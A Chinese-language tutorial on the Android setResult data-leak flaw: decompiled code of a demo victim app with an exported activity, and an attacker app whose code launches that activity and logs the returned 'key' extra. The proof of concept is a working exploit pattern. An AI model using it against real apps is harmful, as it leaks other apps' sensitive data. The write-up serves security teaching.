https://mp.weixin.qq.com/s/tKhPHvbzGOsWs4qyFdQe9Q

setResult漏洞主要由Intent错误传输导致的。

受害者应用使用startActivityForResult启动另一个activity B，并使用onActivityResult方法接收数据，activity B可以回传一些数据给他的启动者，使用setResult方法。

在这个过程中，如果activity B可导出，那么可以从第三方给他传一个符合条件的Intent，触发到他的setResult方法，并且由于这个方法是由于第三方传入的Intent调用，所以回传数据时候也是第三方的onActivityResult方法接受数据。从而导致泄露敏感信息

注：现在startActivityForResult 已弃用

受害者应用MainActivity：

package com.demo.setresult;

import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

/* loaded from: classes3.dex */
public class MainActivity extends AppCompatActivity {
    private static final int REQUEST_CODE = 1;

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Intent intent = new Intent(this, ActivityB.class);
        startActivityForResult(intent, 1);
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity
    public void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);
        System.out.println("onActivityResult");
        if (requestCode == 1) {
            System.out.println("REQUEST_CODE");
            if (resultCode == -1) {
                if (data != null) {
                    String result = data.getStringExtra("key");
                    System.out.println(result);
                    return;
                }
                return;
            }
            System.out.println("NO_KEY");
            return;
        }
        System.out.println("NO_REQUEST_CODE");
    }
}

ActivityB：

package com.demo.setresult;

import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

/* loaded from: classes3.dex */
public class ActivityB extends AppCompatActivity {
    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_b);
        returnResult();
    }

    private void returnResult() {
        Intent resultIntent = new Intent();
        resultIntent.putExtra("key", "key value");
        setResult(-1, resultIntent);
        finish();
    }
}

攻击者：

package com.example.abcd;

import androidx.annotation.Nullable;
import androidx.appcompat.app.AppCompatActivity;

import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

       Intent mIntent = new Intent("action");
       //mIntent.putExtra("key", "");
       		  mIntent.setClassName("com.demo.setresult","com.demo.setresult.ActivityB");
       startActivityForResult(mIntent, 1);
    }

    @Override
    public void onActivityResult(int requestCode, int resultCode,@Nullable Intent data) {
        super.onActivityResult(requestCode, resultCode, data);
        System.out.println("onActivityResult");
        try{
            Log.e("key",data.getStringExtra("key"));
        }catch(Exception e){
            e.printStackTrace();
        }
    }

}